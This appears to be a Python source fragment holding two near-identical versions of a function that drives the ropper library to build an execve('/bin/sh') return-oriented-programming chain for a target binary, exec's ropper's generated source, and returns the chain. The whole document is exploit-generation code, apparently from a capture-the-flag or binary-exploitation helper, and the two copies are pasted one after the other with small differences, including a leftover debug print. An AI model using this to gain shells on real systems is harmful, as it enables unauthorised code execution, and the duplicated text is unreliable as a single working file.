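def getRopchain(properties, bad_bytes):
    """
    Build an execve("/bin/sh") ROP chain for the target binary with ropper.

    ropper's ``createRopChain`` does not hand back a chain object: it
    returns Python *source* that builds a ``rop`` variable and prints it.
    That source is patched up for Python 3 (string literals -> bytes, the
    Python 2 ``print rop`` statement dropped), exec'd in a private
    namespace, and the resulting ``rop`` value is returned.

    Args:
        properties: dict with at least ``'file'`` (path of the target
            binary) and ``'protections'['arch']`` (architecture string);
            optionally ``'libc'`` (path of the linked libc, or None).
        bad_bytes: iterable of strings concatenated into ropper's
            ``badbytes`` option -- presumably hex digits such as
            ``["0a", "00"]``; confirm against ropper's expected format.

    Returns:
        The ``rop`` value created by the generated chain script.

    Raises:
        SystemExit: status 1 when ropper cannot build a complete chain
            (the old code exited with status 0, which made failures look
            like success to callers and shells).
    """
    import sys

    options = {
        'color': False,
        'badbytes': ''.join(bad_bytes),
        'all': False,
        'inst_count': 6,
        'type': 'all',
        'count_of_findings': 5,
        'cfg_only': False,
        'detailed': False
    }

    rs = RopperService(options)
    # Remember whether libc was actually added so cleanup mirrors it exactly
    # (the old code called removeFile(None) when the key existed but was None).
    have_libc = properties.get('libc') is not None
    if have_libc:
        rs.addFile(properties['libc'])
    rs.addFile(properties['file'])

    try:
        rs.loadGadgetsFor()

        # ropper spells architectures differently from pwntools
        # (x86, x86_64, ARM, ...), see
        # https://github.com/sashs/Ropper/blob/a708fae670eece2b86daeaa276b38cb033eab231/README.md
        # ARM is tested *before* the "64" substring check: 'aarch64'
        # contains '64' and was previously mis-mapped to x86_64.
        # 'ARM64' is ropper's name for 64-bit ARM per that README --
        # verify against the installed ropper version.
        arch_name = properties['protections']['arch'].lower()
        if 'arm' in arch_name or 'aarch' in arch_name:
            arch = 'ARM64' if '64' in arch_name else 'ARM'
        elif '64' in arch_name:
            arch = 'x86_64'
        else:
            arch = 'x86'

        chain = rs.createRopChain("execve", arch, {'cmd': '/bin/sh'})
        chain = chain.replace(" '", " b'")  # convert all strings to bytes
        chain = chain.replace("print rop", "")  # removes invalid print statement

        # 'INSERT' marks a placeholder ropper could not fill (incomplete chain).
        if "Cannot create chain" in chain or 'INSERT' in chain:
            print("[-] Failed to create rop chain. Try adding linked libraries")
            if not have_libc:
                print("[~] Try adding linked libc")
            sys.exit(1)

        # SECURITY NOTE: this exec()s Python source emitted by ropper. Its
        # content is derived from the binaries under analysis (gadget
        # addresses), so it deserves the same trust as those binaries;
        # inspect `chain` before running this on samples you do not trust.
        namespace = {}
        exec(chain, namespace)  # rop variable created inside of "chain" python script
    finally:
        # Always detach the files, including on the failure/exit paths above.
        if have_libc:
            rs.removeFile(properties['libc'])
        rs.removeFile(properties['file'])

    return namespace['rop']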
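def getRopchain(properties, bad_bytes):
    """
    Build an execve("/bin/sh") ROP chain for the target binary with ropper.

    ropper's ``createRopChain`` returns Python *source* that builds a
    ``rop`` variable rather than a chain object; that source is exec'd in
    a private namespace and the resulting ``rop`` value is returned.

    Args:
        properties: dict with at least ``'file'`` (path of the target
            binary) and ``'protections'['arch']`` (architecture string);
            optionally ``'libc'`` (path of the linked libc, or None).
        bad_bytes: iterable of strings concatenated into ropper's
            ``badbytes`` option -- presumably hex digits; confirm against
            ropper's expected format.

    Returns:
        The ``rop`` value created by the generated chain script.

    Raises:
        SystemExit: status 1 when ropper cannot build a complete chain
            (the old code exited with status 0, hiding the failure).
    """
    import sys

    options = {
        'color': False,
        'badbytes': ''.join(bad_bytes),
        'all': False,
        'inst_count': 6,
        'type': 'all',
        'count_of_findings': 5,
        'cfg_only': False,
        'detailed': False
    }

    rs = RopperService(options)
    # .get(): the old unconditional properties['libc'] raised KeyError
    # when no libc was supplied, before the membership check below ran.
    print(properties.get('libc'))
    # Remember whether libc was actually added so cleanup mirrors it exactly
    # (the old code called removeFile(None) when the key existed but was None).
    have_libc = properties.get('libc') is not None
    if have_libc:
        rs.addFile(properties['libc'])
    rs.addFile(properties['file'])

    try:
        rs.loadGadgetsFor()

        # ropper spells architectures differently from pwntools
        # (x86, x86_64, ARM, ...), see
        # https://github.com/sashs/Ropper/blob/a708fae670eece2b86daeaa276b38cb033eab231/README.md
        # ARM is tested *before* the "64" substring check: 'aarch64'
        # contains '64' and was previously mis-mapped to x86_64.
        # 'ARM64' is ropper's name for 64-bit ARM per that README --
        # verify against the installed ropper version.
        arch_name = properties['protections']['arch'].lower()
        if 'arm' in arch_name or 'aarch' in arch_name:
            arch = 'ARM64' if '64' in arch_name else 'ARM'
        elif '64' in arch_name:
            arch = 'x86_64'
        else:
            arch = 'x86'

        chain = rs.createRopChain("execve", arch, {'cmd': '/bin/sh'})

        # 'INSERT' marks a placeholder ropper could not fill (incomplete chain).
        if "Cannot create chain" in chain or 'INSERT' in chain:
            print("[-] Failed to create rop chain. Try adding linked libraries")
            if not have_libc:
                print("[~] Try adding linked libc")
            sys.exit(1)

        # SECURITY NOTE: this exec()s Python source emitted by ropper. Its
        # content is derived from the binaries under analysis (gadget
        # addresses), so it deserves the same trust as those binaries;
        # inspect `chain` before running this on samples you do not trust.
        # NOTE(review): if the emitted source still uses the Python 2
        # ``print rop`` statement, exec() fails under Python 3 -- strip it
        # (and convert string literals to bytes) before exec'ing if so.
        namespace = {}
        exec(chain, namespace)  # rop variable created inside of "chain" python script
    finally:
        # Always detach the files, including on the failure/exit paths above.
        if have_libc:
            rs.removeFile(properties['libc'])
        rs.removeFile(properties['file'])

    return namespace['rop']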